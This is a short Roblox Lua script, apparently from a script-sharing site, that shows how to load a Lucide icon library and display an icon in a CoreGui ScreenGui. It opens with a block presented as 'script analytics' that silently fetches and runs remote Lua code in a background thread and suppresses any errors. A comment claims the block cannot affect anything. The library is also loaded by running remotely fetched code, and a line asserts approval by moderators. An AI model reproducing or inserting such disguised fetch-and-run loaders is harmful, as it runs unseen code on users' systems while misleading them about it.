--[[rscripts:analytics:start]] -- Script analytics (enabled by the creator on rscripts.net). -- Runs in its own thread and cannot affect the script below. task.spawn(function() pcall(function() loadstring(game:HttpGet("https://rscripts.net/api/telemetry/client.lua?s=69c91884348d219b4dd24828"))() end) end) --[[rscripts:analytics:end]] -- NOTICE TO ANY MODS, Kawaza and iamunknown77 APPROVED THIS -- Installation: local lucide = loadstring(game:HttpGet( "https://raw.githubusercontent.com/xxpwnxxx420lord/Lucide.Lua/refs/heads/main/lucide.lua", true ))() -- EXAMPLE: local lucide = loadstring(game:HttpGet( "https://raw.githubusercontent.com/xxpwnxxx420lord/Lucide.Lua/refs/heads/main/lucide.lua", true ))() local icon = lucide:geticon("arrow-right", { size = 48, color = "#ffffff", stroke_width = 1.5, }) local screenGui = Instance.new("ScreenGui") screenGui.ResetOnSpawn = false screenGui.Parent = game.CoreGui local imageLabel = Instance.new("ImageLabel") imageLabel.Image = icon imageLabel.Size = UDim2.new(0, 48, 0, 48) imageLabel.Position = UDim2.new(0.5, -24, 0.5, -24) imageLabel.BackgroundTransparency = 1 imageLabel.ScaleType = Enum.ScaleType.Fit imageLabel.Parent = screenGui THIS ICON LIBRARY SUPPORTS EVERY LUCIDE ICON